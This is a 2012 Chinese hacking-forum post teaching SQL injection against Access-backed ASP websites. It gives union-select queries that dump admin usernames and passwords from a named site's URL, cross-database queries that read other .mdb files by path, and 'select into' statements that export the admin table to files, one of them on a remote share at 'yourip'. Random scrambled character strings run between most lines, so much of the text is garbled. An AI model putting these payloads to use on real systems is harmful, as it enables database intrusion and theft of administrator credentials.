中国网络渗透测试联盟
标题:
Access高级注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 14:20
标题:
Access高级注入语句
--------------------------------------------------------------
9 o) K. [1 r0 R& R! s& \. I
union查询法
& y! Y/ R4 b6 v m. B
首先要说的就是查询办法,一般的查询办法就是
7 v& |/ W4 j6 z$ y0 ^# @4 d
0 c5 u& A5 k) b" h4 e- g: a' S+ C" ?
程序代码
: _# }5 y$ i+ e# N- `) \& z; `: o6 z
and 1=(select count(*) from admin where left(id,1)='1')
& c* l' ~ R- `, e7 y7 M! j' Y' E
9 @% M% m: M; V4 e( e& \7 b
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
$ ?7 n: A R/ H& x
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
, j+ G7 a" Q$ |6 M4 f) Q
譬如你有一个ACCESS点:
1 ]! J! ^4 F( \5 {0 g
程序代码
2 U. R2 w M2 o. s
http://bbs.tian6.com/xiaoyang.asp?coder=1
' X+ r+ y3 i7 ?7 |/ L! p J7 ~- a
7 ^+ n5 j/ L5 M0 f+ J A
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
: c# W! |* t$ t: `9 N& E( L
然后我们直接来:
" ] K0 o" H3 Q
程序代码
; w2 @4 m/ W+ `( R
http://bbs.tian6.com/xiaoyang.asp?coder=1
union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
+ A$ \3 N) O; h) [6 n. n6 f- T
9 V, E& p5 a( c
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
: ^7 n6 A* X9 ]; B# L
) G1 \# ^- K, X: g k
7 V! P& C) ?( t9 W$ a
# Y" Z) p# b6 Y- b( C
---------------------------------------------------------------
. s, l- t" a, V$ v
Access跨库查询
4 N7 S9 d& K- a# E6 U& Q
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
3 R/ L) N+ V0 v' D$ _
跨库的查询语句:
/ E6 F( @: C5 z+ r
子查询:
8 I0 S5 P9 `4 }, b! c9 S1 C+ I
程序代码
) p) o1 T7 g" Z; f8 m- K
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
# t$ `+ A1 k- h7 @% I& I1 a
2 J, T2 j* n0 o( m
union查询:
3 o( }3 x! l- w4 A4 _: E% Z; l# l. B
程序代码
# X" X& v) y* v/ a. O& ~
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
6 N, b, V2 @8 l! s" O& W' X
' }! _; U( P7 S. s3 F& i5 x
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
0 \- v F3 N6 u9 ~1 V1 [
程序代码
0 ~. E# c" h- E" v8 [4 u
http://www.4ngel.net/article/46.htm
$ H% I$ f) }: r' r' k
http://hf110.com/Article/hack/rqsl/200502/66.html
* {0 W Y4 B8 p: a
* g- w9 l N, I* v
---------------------------------------------------------------
3 L& {6 J; d" D1 @* _% b% j# H
Access注入,导出txt,htm,html
' a% m1 f3 Z/ U- Q( H9 t
子查询语句:
! B; H7 ]% ^* E( I2 }8 T
程序代码
. ]8 Q4 |' x& a( Z" H9 J$ s9 W
Select * into [test.txt] in 'd:\web\' 'text;' from admin
; m5 A) w9 K0 X
! m0 W& \8 \! ]; K
这样就把admin表的内容以test类型存进了d:\web里面.
' j% i. N6 V# I: T5 o
UNION查询:
" J7 g% W3 p) P( ?. u$ g1 x
程序代码
8 j4 C! \4 z. j) W
union select * into [admin.txt] in 'c:\' 'test;' from admin
& Y4 x8 G! m4 p- ~' @
5 X; v9 B, w: z; m7 ^
而且这里也可以保存到本地来:
8 W. W6 P: v! ^! a5 r2 d+ v
程序代码
. {2 P t6 x, c: ]$ e3 H0 q3 e8 L
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
4 U+ L* e/ C/ |4 \
: j' I% T% r/ v
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
+ o9 g& o9 N2 t* y% `" u% ^
1 L* J$ O' }" |* x3 h. ?7 P( V0 k: \
程序代码
! \0 h) p( G. j3 d8 {/ x
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
- t4 o" s+ X% C. j& \
- ^5 j5 R6 u) U8 U$ ]: h
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
4 m* h- m+ t8 o3 r
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2